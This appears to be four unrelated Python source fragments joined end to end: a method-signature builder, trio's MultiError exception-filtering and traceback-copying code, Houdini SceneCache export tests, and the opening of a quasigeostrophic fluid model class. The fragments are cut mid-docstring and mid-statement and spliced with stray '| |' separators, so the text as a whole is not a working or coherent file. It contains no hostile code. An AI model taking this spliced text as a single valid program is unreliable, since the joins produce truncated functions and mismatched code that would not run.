(False), or simulated via **kwargs under the hood (True). This
is useful when you do not want the argument appearing in the
underlying implementation's `**kwargs` argument unless manually
supplied by the user.
only_if: If `False`, this method is a no-op.
Returns:
A reference to this `MethodBuilder`.
"""
if not only_if:
return self
if isinstance(kind, str):
kind = inspect._ParameterKind[kind.upper()]
# Runtime checks
if virtual:
if kind not in (Parameter.VAR_KEYWORD, Parameter.KEYWORD_ONLY):
raise RuntimeError(
f"Virtual arguments can only be `KEYWORD_ONLY` or `VAR_KEYWORD`, not `{kind.name}`."
)
if self.method_args_virtual and self.method_args_virtual[
-1
].kind.value > min(kind.value, Parameter.KEYWORD_ONLY.value):
raise RuntimeError(
f"Virtual arguments of kind `{kind.name}` cannot be added after `{self.method_args_virtual[-1].kind.name}` arguments."
)
elif self.method_args and self.method_args[-1].kind.value > min(
kind.value, Parameter.KEYWORD_ONLY.value
):
raise RuntimeError(
f"Arguments of kind `{kind.name}` cannot be added after `{self.method_args[-1].kind.name}` arguments."
)
self.doc_args.append(
"\n".join(
textwrap.wrap(
f"{name}: {desc or 'Undocumented argument.'}",
subsequent_indent=" ",
)
)
)
# If this is the first virtual argument, append a `kwargs` non-virtual argument to collect these virtual arguments.
if virtual and not self.method_args_virtual:
self.method_args.append(Parameter("kwargs", kind=Parameter.VAR_KEYWORD))
(self.method_args_virtual if virtual else self.method_args).append(
Parameter(
name,
kind=kind,
default=default,
annotation=annotation,
)
)
if virtual and kind is Parameter.VAR_KEYWORD:
self.check_attrs_match_sig = False
return self
def with_args(
self,
args: Union[List[str], Dict[str, str]],
*,
annotations: Optional[Dict[str, Type]] = None,
defaults: Optional[Dict[str, Any]] = None,
virtual: bool = False,
only_if: bool = True,
) -> MethodBuilder:
"""
Append multiple arguments at once to the method wrapper. This is a
convenience wrapper only, and just makes out calls to `with_arg`. All
arguments are assumed to be of kind `KEYWORD_ONLY`.
Args:
args: A list of argument names, or a mapping of argument names to
descriptions.
annotations: An optional mapping from argument name to annotation
for that argument.
defaults: An optional mapping from argument name to default values.
kind: The kind of argument. For convenience you can pass a string
here instead of the enum value. Options are: 'positional_only',
'positional_or_keyword', 'var_positional', 'keyword_only',
and 'var_keyword'. Note that virtual arguments can only be
'keyword_only' and 'var_keyword'.
virtual: Whether the arguments should be compiled into the method
(False), or simulated via **kwargs under the hood (True). This
is useful when you do not want the argument appearing in the
underlying implementation's `**kwargs` argument unless manually
supplied by the user.
only_if: If `False`, this method is a no-op.
Returns:
A reference to this `MethodBuilder`.
"""
if not only_if or not args:
return self
# Remove any arguments that already exist in the function signature.
duplicate_args = {
*(arg.name for arg in self.method_args),
*(arg.name for arg in self.method_args_virtual),
}.intersection(args)
if duplicate_args:
raise RuntimeError(
f"Method already has some incoming arguments: {duplicate_args}"
)
# Cast to a dictionary so we only have to deal with one format.
if not isinstance(args, dict):
args = {arg: None for arg in args}
defaults = defaults or {}
for name, desc in args.items():
self.with_arg(
name,
desc=desc,
annotation=(annotations or {}).get(name, Parameter.empty),
default=(defaults or {}).get(name, MISSING),
kind=Parameter.KEYWORD_ONLY,
virtual=virtual,
)
return self
def with_spec_attrs_for(
self,
spec_cls: type,
*,
desc_template: Optional[str] = None,
only_if: bool = True,
) -> MethodBuilder:
"""
Add virtual arguments corresponding to the attributes of a spec-class.
This uses `.with_args` and `.with_arg` under the hood.
Args:
spec_cls: The spec class for which arguments should be added to the
method (one for each spec-class attribute).
desc_template: If provided, should be a template with one unnamed
format parameter `{}` (which will be replaced with the attribute
name); otherwise the attribute descriptions will be used.
only_if: If `False`, this method is a no-op.
Returns:
A reference to this `MethodBuilder`.
"""
if not only_if or not hasattr(spec_cls, "__spec_class__"):
return self
args = {}
annotations = {}
defaults = {}
current_args = {
*(arg.name for arg in self.method_args),
*(arg.name for arg in self.method_args_virtual),
}
for attr, attr_spec in spec_cls.__spec_class__.attrs.items():
if (
not attr_spec.init
or attr in current_args
or attr == spec_cls.__spec_class__.init_overflow_attr
):
continue
args[attr] = (
desc_template.format(attr_spec.name)
if desc_template is not None
else attr_spec.desc
)
annotations[attr] = attr_spec.type
defaults[attr] = MISSING if attr_spec.is_masked else attr_spec.default
self.with_args(
args=args,
annotations=annotations,
defaults=defaults,
virtual=True,
)
if spec_cls.__spec_class__.init_overflow_attr:
attr_spec = spec_cls.__spec_class__.attrs[
spec_cls.__spec_class__.init_overflow_attr
]
self.with_arg(
name=attr_spec.name,
desc=attr_spec.desc,
annotation=attr_spec.type,
kind=Parameter.VAR_KEYWORD,
virtual=True,
)
return self
def with_returns(
self, desc: str, *, annotation: Type = Parameter.empty, only_if: bool = True
) -> MethodBuilder:
"""
Specify the return type and description of the method being built.
Args:
spec_cls: The spec class for which arguments should be added to the
method (one for each spec-class attribute).
desc: A description for the returned value (will be added to the
method docstring).
annotation: An (optional) | |
import sys
import traceback
import textwrap
import warnings
import attr
__all__ = ["MultiError"]
################################################################
# MultiError
################################################################
def _filter_impl(handler, root_exc):
# We have a tree of MultiError's, like:
#
# MultiError([
# ValueError,
# MultiError([
# KeyError,
# ValueError,
# ]),
# ])
#
# or similar.
#
# We want to
# 1) apply the filter to each of the leaf exceptions -- each leaf
# might stay the same, be replaced (with the original exception
# potentially sticking around as __context__ or __cause__), or
# disappear altogether.
# 2) simplify the resulting tree -- remove empty nodes, and replace
# singleton MultiError's with their contents, e.g.:
# MultiError([KeyError]) -> KeyError
# (This can happen recursively, e.g. if the two ValueErrors above
# get caught then we'll just be left with a bare KeyError.)
# 3) preserve sensible tracebacks
#
# It's the tracebacks that are most confusing. As a MultiError
# propagates through the stack, it accumulates traceback frames, but
# the exceptions inside it don't. Semantically, the traceback for a
# leaf exception is the concatenation the tracebacks of all the
# exceptions you see when traversing the exception tree from the root
# to that leaf. Our correctness invariant is that this concatenated
# traceback should be the same before and after.
#
# The easy way to do that would be to, at the beginning of this
# function, "push" all tracebacks down to the leafs, so all the
# MultiErrors have __traceback__=None, and all the leafs have complete
# tracebacks. But whenever possible, we'd actually prefer to keep
# tracebacks as high up in the tree as possible, because this lets us
# keep only a single copy of the common parts of these exception's
# tracebacks. This is cheaper (in memory + time -- tracebacks are
# unpleasantly quadratic-ish to work with, and this might matter if
# you have thousands of exceptions, which can happen e.g. after
# cancelling a large task pool, and no-one will ever look at their
# tracebacks!), and more importantly, factoring out redundant parts of
# the tracebacks makes them more readable if/when users do see them.
#
# So instead our strategy is:
# - first go through and construct the new tree, preserving any
# unchanged subtrees
# - then go through the original tree (!) and push tracebacks down
# until either we hit a leaf, or we hit a subtree which was
# preserved in the new tree.
# This used to also support async handler functions. But that runs into:
# https://bugs.python.org/issue29600
# which is difficult to fix on our end.
# Filters a subtree, ignoring tracebacks, while keeping a record of
# which MultiErrors were preserved unchanged
def filter_tree(exc, preserved):
if isinstance(exc, MultiError):
new_exceptions = []
changed = False
for child_exc in exc.exceptions:
new_child_exc = filter_tree(child_exc, preserved)
if new_child_exc is not child_exc:
changed = True
if new_child_exc is not None:
new_exceptions.append(new_child_exc)
if not new_exceptions:
return None
elif changed:
return MultiError(new_exceptions)
else:
preserved.add(exc)
return exc
else:
new_exc = handler(exc)
# Our version of implicit exception chaining
if new_exc is not None and new_exc is not exc:
new_exc.__context__ = exc
return new_exc
def push_tb_down(tb, exc, preserved):
if exc in preserved:
return
new_tb = concat_tb(tb, exc.__traceback__)
if isinstance(exc, MultiError):
for child_exc in exc.exceptions:
push_tb_down(new_tb, child_exc, preserved)
exc.__traceback__ = None
else:
exc.__traceback__ = new_tb
preserved = set()
new_root_exc = filter_tree(root_exc, preserved)
push_tb_down(None, root_exc, preserved)
return new_root_exc
# Normally I'm a big fan of (a)contextmanager, but in this case I found it
# easier to use the raw context manager protocol, because it makes it a lot
# easier to reason about how we're mutating the traceback as we go. (End
# result: if the exception gets modified, then the 'raise' here makes this
# frame show up in the traceback; otherwise, we leave no trace.)
@attr.s(frozen=True)
class MultiErrorCatcher:
_handler = attr.ib()
def __enter__(self):
pass
def __exit__(self, etype, exc, tb):
if exc is not None:
filtered_exc = MultiError.filter(self._handler, exc)
if filtered_exc is exc:
# Let the interpreter re-raise it
return False
if filtered_exc is None:
# Swallow the exception
return True
# When we raise filtered_exc, Python will unconditionally blow
# away its __context__ attribute and replace it with the original
# exc we caught. So after we raise it, we have to pause it while
# it's in flight to put the correct __context__ back.
old_context = filtered_exc.__context__
try:
raise filtered_exc
finally:
_, value, _ = sys.exc_info()
assert value is filtered_exc
value.__context__ = old_context
class MultiError(BaseException):
"""An exception that contains other exceptions; also known as an
"inception".
It's main use is to represent the situation when multiple child tasks all
raise errors "in parallel".
Args:
exceptions (list): The exceptions
Returns:
If ``len(exceptions) == 1``, returns that exception. This means that a
call to ``MultiError(...)`` is not guaranteed to return a
:exc:`MultiError` object!
Otherwise, returns a new :exc:`MultiError` object.
Raises:
TypeError: if any of the passed in objects are not instances of
:exc:`BaseException`.
"""
def __new__(cls, exceptions):
exceptions = list(exceptions)
for exc in exceptions:
if not isinstance(exc, BaseException):
raise TypeError(
"Expected an exception object, not {!r}".format(exc)
)
if len(exceptions) == 1:
return exceptions[0]
else:
self = BaseException.__new__(cls)
self.exceptions = exceptions
return self
def __str__(self):
return ", ".join(repr(exc) for exc in self.exceptions)
def __repr__(self):
return "<MultiError: {}>".format(self)
@classmethod
def filter(cls, handler, root_exc):
"""Apply the given ``handler`` to all the exceptions in ``root_exc``.
Args:
handler: A callable that takes an atomic (non-MultiError) exception
as input, and returns either a new exception object or None.
root_exc: An exception, often (though not necessarily) a
:exc:`MultiError`.
Returns:
A new exception object in which each component exception ``exc`` has
been replaced by the result of running ``handler(exc)`` – or, if
``handler`` returned None for all the inputs, returns None.
"""
return _filter_impl(handler, root_exc)
@classmethod
def catch(cls, handler):
"""Return a context manager that catches and re-throws exceptions
after running :meth:`filter` on them.
Args:
handler: as for :meth:`filter`
"""
return MultiErrorCatcher(handler)
# Clean up exception printing:
MultiError.__module__ = "trio"
################################################################
# concat_tb
################################################################
# We need to compute a new traceback that is the concatenation of two existing
# tracebacks. This requires copying the entries in 'head' and then pointing
# the final tb_next to 'tail'.
#
# NB: 'tail' might be None, which requires some special handling in the ctypes
# version.
#
# The complication here is that Python doesn't actually support copying or
# modifying traceback objects, so we have to get creative...
#
# On CPython, we use ctypes. On PyPy, we use "transparent proxies".
#
# Jinja2 is a useful source of inspiration:
# https://github.com/pallets/jinja/blob/master/jinja2/debug.py
try:
import tputil
except ImportError:
have_tproxy = False
else:
have_tproxy = True
if have_tproxy:
# http://doc.pypy.org/en/latest/objspace-proxies.html
def copy_tb(base_tb, tb_next):
def controller(operation):
# Rationale for pragma: I looked fairly carefully and tried a few
# things, and AFAICT it's not actually possible to get any
# 'opname' that isn't __getattr__ or __getattribute__. So there's
# no missing test we could add, and no value in coverage nagging
# us about adding one.
if operation.opname in [
"__getattribute__", "__getattr__"
]: # pragma: no cover
if operation.args[0] == "tb_next":
return tb_next
return operation.delegate()
return tputil.make_proxy(controller, type(base_tb), base_tb)
else:
# ctypes it is
import ctypes
# How to handle refcounting? I don't want to use ctypes.py_object because
# I don't understand or trust it, and I don't want to use
# ctypes.pythonapi.Py_{Inc,Dec}Ref because we might clash with user code
# that also tries to use them but with different types. So private _ctypes
# APIs it is!
import _ctypes
class CTraceback(ctypes.Structure):
_fields_ = [
("PyObject_HEAD", ctypes.c_byte * object().__sizeof__()),
("tb_next", ctypes.c_void_p),
("tb_frame", ctypes.c_void_p),
("tb_lasti", ctypes.c_int),
("tb_lineno", ctypes.c_int),
]
def copy_tb(base_tb, tb_next):
# TracebackType has no public constructor, so allocate one the hard way
try:
raise ValueError
except ValueError as exc:
new_tb = exc.__traceback__
c_new_tb = CTraceback.from_address(id(new_tb))
# At the C level, tb_next either pointer to the next traceback or is
# NULL. c_void_p and the .tb_next accessor both convert NULL | |
IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( b.readAttribute( IECore.LinkedScene.timeLinkAttribute, 0 ), IECore.DoubleData( 0 ) )
d = a.child( "4" )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.fileNameLinkAttribute ) )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.rootLinkAttribute ) )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.timeLinkAttribute ) )
# force b and below as links even though they are expanded
hou.setTime( -1.0 / hou.fps() )
xform = self.xform()
xform.parm( "expand" ).pressButton()
rop = self.rop( xform )
rop.parm( "file" ).set( TestSceneCache.__testLinkedOutFile )
rop.parm( "forceObjects" ).set( "*4*" )
testLinks()
# make sure parents expand if their child is forced
rop.parm( "forceObjects" ).set( "*5*" )
testLinks()
# make sure normal geo gets expanded regardless
geo = xform.createNode( "geo", "real" )
geo.createNode( "box" )
testLinks( bakedObjects = [ "real" ] )
unlinked = IECore.SceneCache( TestSceneCache.__testLinkedOutFile, IECore.IndexedIO.OpenMode.Read )
real = unlinked.child( "real" )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.fileNameLinkAttribute ) )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.rootLinkAttribute ) )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.timeLinkAttribute ) )
self.assertTrue( real.hasObject() )
geo.destroy()
# make sure natural links (unexpanded branches) still work
hou.node( xform.path() + "/1/2" ).parm( "collapse" ).pressButton()
testLinks()
# make sure normal SceneCaches aren't broken by forceObjects
rop.parm( "file" ).set( TestSceneCache.__testOutFile )
self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
rop.parm( "execute" ).pressButton()
self.assertEqual( rop.errors(), "" )
self.assertTrue( os.path.exists( TestSceneCache.__testOutFile ) )
orig = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Read )
result = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
self.compareScene( orig, result )
def testRopErrors( self ) :
xform = self.xform()
rop = self.rop( xform )
rop.parm( "file" ).set( "/tmp/bad.file" )
rop.parm( "execute" ).pressButton()
self.assertNotEqual( rop.errors(), "" )
self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
rop.parm( "file" ).set( TestSceneCache.__testOutFile )
rop.parm( "rootObject" ).set( "/obj/fake/object" )
self.assertNotEqual( rop.errors(), "" )
self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
rop.parm( "rootObject" ).set( xform.path() )
xform.destroy()
self.assertNotEqual( rop.errors(), "" )
self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
sop = self.sop()
rop.parm( "rootObject" ).set( sop.path() )
rop.parm( "execute" ).pressButton()
self.assertNotEqual( rop.errors(), "" )
self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
newXform = self.xform()
rop.parm( "rootObject" ).set( newXform.path() )
rop.parm( "execute" ).pressButton()
self.assertEqual( rop.errors(), "" )
self.assertTrue( os.path.exists( TestSceneCache.__testOutFile ) )
def testAnimatedRop( self ) :
self.writeAnimSCC()
xform = self.xform()
xform.parm( "hierarchy" ).set( IECoreHoudini.SceneCacheNode.Hierarchy.Parenting )
xform.parm( "expand" ).pressButton()
rop = self.rop( xform )
rop.parm( "trange" ).set( 1 )
rop.parmTuple( "f" ).set( ( 0, 10 * hou.fps(), 1 ) )
rop.parm( "execute" ).pressButton()
orig = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Read )
output = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
times = range( 0, 10 )
halves = [ x + 0.5 for x in times ]
quarters = [ x + 0.25 for x in times ]
times.extend( [ x + 0.75 for x in times ] )
times.extend( halves )
times.extend( quarters )
times.sort()
for time in times :
self.compareScene( orig, output, time )
def testRopCookCounts( self ) :
self.writeAnimSCC()
xform = self.xform()
xform.parm( "expand" ).pressButton()
a = hou.node( xform.path()+"/1/geo/1" ) # static
b = hou.node( xform.path()+"/1/2/geo/2" ) # animated
c = hou.node( xform.path()+"/1/2/3/geo/3" ) # static
# make sure nothing has been cooked
self.assertEqual( a.cookCount(), 0 )
self.assertEqual( b.cookCount(), 0 )
self.assertEqual( c.cookCount(), 0 )
# cook current frame
rop = self.rop( xform )
rop.parm( "execute" ).pressButton()
self.assertEqual( rop.errors(), "" )
self.assertEqual( a.cookCount(), 1 )
self.assertEqual( b.cookCount(), 1 )
self.assertEqual( c.cookCount(), 1 )
# cook single frame that is not the current frame
self.assertNotEqual( hou.frame(), 10 )
rop.parm( "trange" ).set( 1 )
rop.parm( "f1" ).set( 10 )
rop.parm( "f2" ).set( 10 )
rop.parm( "execute" ).pressButton()
self.assertEqual( rop.errors(), "" )
self.assertEqual( a.cookCount(), 1 )
self.assertEqual( b.cookCount(), 2 )
self.assertEqual( c.cookCount(), 1 )
# cook a range
rop.parm( "f1" ).set( 1 )
rop.parm( "f2" ).set( 10 )
rop.parm( "execute" ).pressButton()
self.assertEqual( rop.errors(), "" )
self.assertEqual( a.cookCount(), 1 )
self.assertEqual( b.cookCount(), 12 )
self.assertEqual( c.cookCount(), 1 )
# with flat geo
sop = self.sop()
self.assertEqual( sop.cookCount(), 0 )
rop.parm( "rootObject" ).set( sop.parent().path() )
rop.parm( "trange" ).set( 1 )
rop.parm( "f1" ).set( 10 )
rop.parm( "f2" ).set( 10 )
rop.parm( "execute" ).pressButton()
self.assertEqual( sop.cookCount(), 1 )
def testRopDynamicSopHierarchy( self ) :
self.writeAnimSCC()
obj = self.geometry()
obj.parm( "expand" ).pressButton()
delete = obj.renderNode().createOutputNode( "delete" )
delete.parm( "groupop" ).set( 1 ) # by range
delete.parm( "rangestart" ).set( 2 )
delete.parm( "rangeend" ).set( 2 )
switch = obj.renderNode().createOutputNode( "switch" )
switch.setInput( 1, delete )
switch.parm( "input" ).setExpression( "if hou.frame() >= 5 :\n\treturn 0\nelse :\n\treturn 1", hou.exprLanguage.Python )
switch.setRenderFlag( True )
rop = self.rop( obj )
rop.parm( "trange" ).set( 1 )
rop.parm( "f1" ).set( 1 )
rop.parm( "f2" ).set( 20 )
rop.parm( "execute" ).pressButton()
output = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
a = output.child( "1" )
b = a.child( "2" )
c = b.child( "3" )
attr = "scene:visible"
self.assertFalse( a.hasAttribute( attr ) )
self.assertFalse( b.hasAttribute( attr ) )
self.assertTrue( c.hasAttribute( attr ) )
self.assertEqual( c.readAttribute( attr, 0 ), IECore.BoolData( False ) )
self.assertEqual( c.readAttribute( attr, 0.2083 ), IECore.BoolData( False ) )
self.assertEqual( c.readAttribute( attr, 0.2084 ), IECore.BoolData( True ) )
self.assertEqual( c.readAttribute( attr, 1 ), IECore.BoolData( True ) )
del output, a, b, c
IECore.SharedSceneInterfaces.clear()
# make sure it can appear and disappear correctly
switch.parm( "input" ).setExpression( "if hou.frame() < 5 or hou.frame() >= 10 :\n\treturn 1\nelse :\n\treturn 0", hou.exprLanguage.Python )
rop.parm( "execute" ).pressButton()
hou.hipFile.save( "/tmp/bunk.hip" )
output = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
a = output.child( "1" )
b = a.child( "2" )
c = b.child( "3" )
self.assertFalse( a.hasAttribute( attr ) )
self.assertFalse( b.hasAttribute( attr ) )
self.assertTrue( c.hasAttribute( attr ) )
self.assertEqual( c.readAttribute( attr, 0 ), IECore.BoolData( False ) )
self.assertEqual( c.readAttribute( attr, 0.2083 ), IECore.BoolData( False ) )
self.assertEqual( c.readAttribute( attr, 0.2084 ), IECore.BoolData( True ) )
self.assertEqual( c.readAttribute( attr, 0.3 ), IECore.BoolData( True ) )
self.assertEqual( c.readAttribute( attr, 0.4167 ), IECore.BoolData( False ) )
self.assertEqual( c.readAttribute( attr, 1 ), IECore.BoolData( False ) )
def testLiveScene( self ) :
self.writeTaggedSCC()
xform = self.xform()
xform.parm( "hierarchy" ).set( IECoreHoudini.SceneCacheNode.Hierarchy.SubNetworks )
xform.parm( "depth" ).set( IECoreHoudini.SceneCacheNode.Depth.Children )
xform.parm( "expand" ).pressButton()
a = xform.children()[0]
a.parm( "expand" ).pressButton()
b = a.children()[1]
b.parm( "hierarchy" ).set( IECoreHoudini.SceneCacheNode.Hierarchy.FlatGeometry )
b.parm( "depth" ).set( IECoreHoudini.SceneCacheNode.Depth.AllDescendants )
b.parm( "expand" ).pressButton()
orig = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Read )
live = IECoreHoudini.LiveScene( xform.path(), rootPath = [ xform.name() ] )
self.compareScene( orig, live, bakedObjects = [ "3" ] )
def testTopologyChanges( self ) :
plane = IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) )
box = IECore.MeshPrimitive.createBox( IECore.Box3f( IECore.V3f( 0 ), IECore.V3f( 1 ) ) )
box["Cd"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Uniform, IECore.Color3fVectorData( [ IECore.Color3f( 1, 0, 0 ) ] * box.variableSize( IECore.PrimitiveVariable.Interpolation.Uniform ) ) )
box2 = IECore.MeshPrimitive.createBox( IECore.Box3f( IECore.V3f( 2 ), IECore.V3f( 3 ) ) )
box2["Cd"] = IECore.PrimitiveVariable( IECore.PrimitiveVariable.Interpolation.Uniform, IECore.Color3fVectorData( [ IECore.Color3f( 0, 1, 0 ) ] * box.variableSize( IECore.PrimitiveVariable.Interpolation.Uniform ) ) )
s = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Write )
a = s.createChild( "a" )
b = a.createChild( "b" )
c = a.createChild( "c" )
d = a.createChild( "d" )
# animated topology
b.writeObject( box, 0 )
b.writeObject( plane, 1 )
# static
c.writeObject( box, 0 )
c.writeObject( box, 1 )
# animated P and Cd
d.writeObject( box, 0 )
d.writeObject( box2, 1 )
del s, a, b, c, d
spf = 1.0 / hou.fps()
hou.setTime( 0 - spf )
node = self.sop()
node.parm( "geometryType" ).set( IECoreHoudini.SceneCacheNode.GeometryType.Houdini )
prims = node.geometry().prims()
self.assertEqual( len(prims), 18 )
self.assertEqual( len(node.geometry().points()), 24 )
nameAttr = node.geometry().findPrimAttrib( "name" )
self.assertEqual( set(nameAttr.strings()), set([ '/a/b', '/a/c', '/a/d' ]) )
bPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/b' ]
cPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/c' ]
dPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/d' ]
self.assertEqual( len(bPrims), 6 )
self.assertEqual( len(cPrims), 6 )
self.assertEqual( len(dPrims), 6 )
self.assertEqual( bPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( cPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( dPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( bPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
self.assertEqual( cPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
self.assertEqual( dPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
hou.setTime( 1 - spf )
prims = node.geometry().prims()
self.assertEqual( len(prims), 13 )
self.assertEqual( len(node.geometry().points()), 20 )
nameAttr = node.geometry().findPrimAttrib( "name" )
self.assertEqual( set(nameAttr.strings()), set([ '/a/b', '/a/c', '/a/d' ]) )
bPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/b' ]
cPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/c' ]
dPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/d' ]
self.assertEqual( len(bPrims), 1 )
self.assertEqual( len(cPrims), 6 )
self.assertEqual( len(dPrims), 6 )
self.assertEqual( bPrims[0].vertex( 0 ).point().position(), hou.Vector3( -1, 1, 0 ) )
self.assertEqual( cPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( dPrims[0].vertex( 0 ).point().position(), hou.Vector3( 2, 2, 2 ) )
self.assertEqual( bPrims[0].attribValue( "Cd" ), ( 0, 0, 0 ) )
self.assertEqual( cPrims[0].attribValue( "Cd" ), ( 1, 0, 0 ) )
self.assertEqual( dPrims[0].attribValue( "Cd" ), ( 0, 1, 0 ) )
hou.setTime( 0.5 - spf )
prims = node.geometry().prims()
self.assertEqual( len(prims), 13 )
self.assertEqual( len(node.geometry().points()), 20 )
nameAttr = node.geometry().findPrimAttrib( "name" )
self.assertEqual( set(nameAttr.strings()), set([ '/a/b', '/a/c', '/a/d' ]) )
bPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/b' ]
cPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/c' ]
dPrims = [ x for x in prims if x.attribValue( nameAttr ) == '/a/d' ]
self.assertEqual( len(bPrims), 1 )
self.assertEqual( len(cPrims), 6 )
self.assertEqual( len(dPrims), 6 )
self.assertEqual( bPrims[0].vertex( 0 ).point().position(), hou.Vector3( -1, 1, 0 ) )
self.assertEqual( cPrims[0].vertex( 0 ).point().position(), hou.Vector3( 0, 0, 0 ) )
self.assertEqual( dPrims[0].vertex( 0 ).point().position(), hou.Vector3( 1, 1, 1 ) | |
import numpy as np
from numpy import pi
import logging
import h5py
from numpy import pi
import logging, os
from .Diagnostics import *
from .Saving import *
class Model(object):
""" Python class that represents the barotropic quasigeostrophic
pseudospectral model in a doubly periodic domain. Physical parameters
observe SI units.
Parameters
-----------
nx: integer (optional)
Number of grid points in the x-direction.
The number of modes is nx/2+1.
ny: integer (optional)
Number of grid points in the y-direction.
If None, then ny=nx.
L: float (optional)
Domain size.
dt: float (optional)
Time step for time integration.
twrite: integer (optional)
Print model status to screen every twrite time steps.
tmax: float (optional)
Total time of simulation.
U: float (optional)
Uniform zonal flow
use_filter: bool (optional)
If True, then uses exponential spectral filter.
nu4: float (optional)
Fouth-order hyperdiffusivity of potential vorticity.
nu: float (optional)
Diffusivity of potential vorticity.
mu: float (optional)
Linear drag of potential vorticity.
passive_scalar: bool (optional)
If True, then calculates passive scalar solution.
nu4c: float (optional)
Fouth-order hyperdiffusivity of passive scalar.
nuc: float (optional)
Diffusivity of passive scalar.
muc: float (optional)
Linear drag of passive scalar.
dealias: bool (optional)
If True, then dealias solution using 2/3 rule.
save_to_disk: bool (optional)
If True, then save parameters and snapshots to disk.
overwrite: bool (optional)
If True, then overwrite extant files.
tsave_snapshots: integer (optional)
Save snapshots every tsave_snapshots time steps.
tdiags: integer (optional)
Calculate diagnostics every tdiags time steps.
path: string (optional)
Location for saving output files.
"""
def __init__(
self,
nx=128,
ny=None,
L=5e5,
dt=10000.,
twrite=1000,
tswrite=10,
tmax=250000.,
use_filter = True,
U = .0,
nu4=5.e9,
nu = 0,
mu = 0,
beta = 0,
passive_scalar = False,
nu4c = 5.e9,
nuc = 0,
muc = 0,
dealias = False,
save_to_disk=False,
overwrite=True,
tsave_snapshots=10,
tdiags = 10,
path = 'output/',
use_mkl=False,
nthreads=1):
self.nx = nx
self.ny = nx
self.L = L
self.W = L
self.dt = dt
self.twrite = twrite
self.tswrite = tswrite
self.tmax = tmax
self.tdiags = tdiags
self.passive_scalar = passive_scalar
self.dealias = dealias
self.U = U
self.beta = beta
self.nu4 = nu4
self.nu = nu
self.mu = mu
self.nu4c = nu4c
self.nuc = nuc
self.muc = muc
self.save_to_disk = save_to_disk
self.overwrite = overwrite
self.tsnaps = tsave_snapshots
self.path = path
self.use_filter = use_filter
self.use_mkl = use_mkl
self.nthreads = nthreads
self._initialize_logger()
self._initialize_grid()
self._allocate_variables()
self._initialize_filter()
self._initialize_etdrk4()
self._initialize_time()
initialize_save_snapshots(self, self.path)
save_setup(self, )
self.cflmax = .5
self._initialize_fft()
self._initialize_diagnostics()
def _allocate_variables(self):
""" Allocate variables so that variable addresses are close in memory.
"""
self.dtype_real = np.dtype('float64')
self.dtype_cplx = np.dtype('complex128')
self.shape_real = (self.ny, self.nx)
self.shape_cplx = (self.ny, self.nx//2+1)
# vorticity
self.q = np.zeros(self.shape_real, self.dtype_real)
self.qh = np.zeros(self.shape_cplx, self.dtype_cplx)
self.qh0 = np.zeros(self.shape_cplx, self.dtype_cplx)
self.qh1 = np.zeros(self.shape_cplx, self.dtype_cplx)
# stream function
self.p = np.zeros(self.shape_real, self.dtype_real)
self.ph = np.zeros(self.shape_cplx, self.dtype_cplx)
def run_with_snapshots(self, tsnapstart=0., tsnapint=432000.):
""" Run the model for prescribed time and yields to user code.
Parameters
----------
tsnapstart : float
The timestep at which to begin yielding.
tstapint : int (number of time steps)
The interval at which to yield.
"""
tsnapints = np.ceil(tsnapint/self.dt)
while(self.t < self.tmax):
self._step_forward()
if self.t>=tsnapstart and (self.tc%tsnapints)==0:
yield self.t
return
def run(self):
""" Run the model until the end (`tmax`).
The algorithm is:
1) Save snapshots (i.e., save the initial condition).
2) Take a tmax/dt steps forward.
3) Save diagnostics.
"""
# save initial conditions
if self.save_to_disk:
if self.passive_scalar:
save_snapshots(self,fields=['t','q','c'])
else:
save_snapshots(self,fields=['t','q'])
# run the model
while(self.t < self.tmax):
self._step_forward()
# save diagnostics
if self.save_to_disk:
save_diagnostics(self)
def _step_forward(self):
""" Step solutions forwards. The algorithm is:
1) Take one time step with ETDRK4 scheme.
2) Incremente diagnostics.
3) Print status.
4) Save snapshots.
"""
self._step_etdrk4()
increment_diagnostics(self,)
self._print_status()
save_snapshots(self,fields=['t','q','c'])
def _initialize_time(self):
""" Initialize model clock and other time variables.
